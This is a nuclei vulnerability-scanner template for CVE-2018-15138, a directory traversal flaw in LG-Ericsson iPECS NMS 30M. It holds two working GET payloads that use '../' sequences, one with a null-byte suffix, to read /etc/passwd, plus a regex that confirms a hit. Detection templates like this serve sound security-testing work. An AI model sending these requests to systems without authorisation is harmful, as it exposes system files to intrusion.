nuclei-templates/cves/2018/CVE-2018-15138.yaml

35 lines
1.0 KiB
YAML

id: CVE-2018-15138
info:
name: LG-Ericsson iPECS NMS 30M Directory Traversal
author: 0x_Akoko
severity: high
description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs.
reference:
- https://cxsecurity.com/issue/WLB-2018080070
- https://nvd.nist.gov/vuln/detail/CVE-2018-15138
- https://www.exploit-db.com/exploits/45167/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-15138
cwe-id: CWE-22
tags: cve,cve2018,ericsson,lfi,traversal
requests:
- method: GET
path:
- "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data"
- "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200